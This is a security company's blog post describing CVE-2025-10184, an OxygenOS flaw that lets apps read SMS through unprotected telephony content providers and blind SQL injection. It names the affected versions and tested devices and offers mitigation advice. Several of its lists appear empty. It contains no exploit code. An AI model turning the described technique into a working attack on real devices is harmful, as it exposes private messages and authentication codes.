Smartphones are now the center of your digital life: they store messages, passwords, photos, banking data, and even work documents. That’s why when a critical vulnerability surfaces in an OS like OnePlus's OxygenOS, the risk is serious. And that’s exactly what has just come to light: a flaw that allows malicious apps to access your SMS without any special permissions or user consent.
At TecnetOne, we want you to understand what’s happening, how it could affect you, and the steps you can take to reduce your risk while waiting for an official fix.
The vulnerability, registered as CVE-2025-10184, affects multiple versions of OxygenOS (from version 12 to the latest, version 15 based on Android 15). It was discovered by researchers at Rapid7, a well-known cybersecurity firm, and as of now, OnePlus has not released a patch to fix the issue.
More concerning, despite responsible disclosure, the company hasn’t officially responded to the researchers. This led Rapid7 to publish full technical details and even a proof-of-concept (PoC) showing how an attacker could exploit the flaw.
The flaw originates from OnePlus’s decision to modify Android’s standard telephony package to include additional content providers such as:
The problem is these providers are not properly configured with the correct READ_SMS permission. That means any app installed on your phone can access these data providers by default, even without SMS permissions.
To make things worse, Rapid7 found that user input isn’t sanitized, leaving the door open to blind SQL injection attacks. Simply put, an attacker could reconstruct the content of your SMS messages character by character from the phone’s database.
Read more: Fake Cryptocurrency Apps on Facebook: How They Steal Your Data
To successfully extract your SMS data, certain conditions must be met:
If those conditions are met, attackers can gradually extract:
Researchers successfully tested the exploit on OnePlus 8T and OnePlus 10 Pro, but note that this is not an exhaustive list.
Since the flaw affects a core system component, any device running OxygenOS 12, 13, 14, or 15 is likely at risk. This is not hardware-dependent—it’s a software issue.
Extra providers OnePlus added on its Telephony package (Source: Rapid7)
If you use an affected OnePlus device, any malicious app could:
This kind of vulnerability creates real risk for identity theft, financial fraud, and unauthorized access to critical services.
The most alarming part isn’t just the vulnerability—it’s OnePlus’s lack of response. As of now, there has been no official communication or patch release.
This leaves users vulnerable and dependent on the vendor to act quickly, while the threat remains real and present.
PoC exploit to infer SMS content (Source: Rapid7)
Until OnePlus releases a fix, here are some mitigation steps to reduce your exposure:
At TecnetOne, we see this vulnerability as a powerful reminder of how fragile device security becomes when manufacturers alter critical Android components without reinforcing proper controls.
It also underscores the fact that SMS is no longer a secure channel for authentication—many experts now recommend moving to app-based MFA or hardware security keys.
Related titles: How to Detect and Remove Spyware Apps on Android
CVE-2025-10184 in OxygenOS is a stark reminder that cybersecurity must be central to your digital strategy. While it specifically impacts OnePlus users, its implications stretch far beyond, as SMS is still widely used for critical processes in banking, social platforms, and enterprise apps.
While waiting for a patch from OnePlus, your best defense is proactive action: install trusted apps, limit SMS-based authentication, and stay vigilant with your accounts.
At TecnetOne, we believe that strong cybersecurity starts with awareness and early action. And this case is a perfect example of why you can never let your guard down in the digital world.